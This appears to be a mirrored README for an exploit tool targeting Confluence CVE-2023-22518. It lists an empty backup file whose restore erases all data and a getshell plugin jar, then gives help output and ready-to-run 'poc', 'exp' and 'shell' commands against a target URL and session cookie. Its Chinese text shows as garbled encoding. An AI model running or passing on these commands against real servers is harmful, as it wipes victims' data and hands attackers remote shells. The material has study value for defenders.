Share
## https://sploitus.com/exploit?id=B3368981-8F94-55C2-A696-DAAC86044700
# CVE-2023-22518

Confluence CVE-2023-22518

## Description

+ `xmlexport-20231127-071916-1.zip`๏ผšConfluence ็ฉบๅค‡ไปฝๆ–‡ไปถ๏ผŒ**็ฉบๅค‡ไปฝไผšๅฏผ่‡ดๆขๅคๅŽไธขๅคฑๅ…จ้ƒจๆ•ฐๆฎ**๏ผ๏ผ๏ผ
+ ๅค‡ไปฝๆ–‡ไปถๅฏ่‡ช่กŒๆ›ฟๆข๏ผŒ็ฝฎไบŽ่„šๆœฌๅŒ็บง็›ฎๅฝ•ๅณๅฏ
+ `shellplug.jar`๏ผšgetshell ๆ’ไปถ๏ผŒๆฅๆบไบŽ๏ผšhttps://github.com/youcannotseemeagain/CVE-2023-22515_RCE
+ ๅฏผๅ‡บๅค‡ไปฝๆ–‡ไปถ็š„ๆŽฅๅฃ`/setup/setup-restore.action`๏ผŒ้œ€่ฆ็™ปๅฝ•ไธ”ๆœ‰ๆƒ้™

## Usage

```powershell
python .\CVE-2023-22518.py -h                                                             


     โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—       โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•    โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•—โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•—      โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•—โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
    โ–ˆโ–ˆโ•‘     โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ• โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•  โ•šโ•โ•โ•โ–ˆโ–ˆโ•—โ•šโ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ• โ–ˆโ–ˆโ•”โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
    โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•      โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
     โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•โ•    โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•       โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ• โ•šโ•โ•โ•โ•โ•

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: ไปฃ็ ไป…ไพ›ๅญฆไน ไฝฟ็”จ๏ผŒ่ฏทๅ‹ฟ็”จไบŽๅ…ถไป–็”จ้€”


optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Url
  -id JSESSIONID, --jsessionid JSESSIONID
                        JSESSIONID
  --timeout TIMEOUT     Timeout (Default: 30 Seconds)
  --proxy PROXY         Proxy

```

### POC

```powershell
python .\CVE-2023-22518.py poc -t http://IP:Port
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-poc.png)

### Exp

```powershell
Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D

python .\CVE-2023-22518.py exp -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-exp.png)

### Shell

```powershell
Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D

python .\CVE-2023-22518.py shell -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-shell.png)

## Thanks

https://github.com/ForceFledgling/CVE-2023-22518

https://github.com/sanjai-AK47/CVE-2023-22518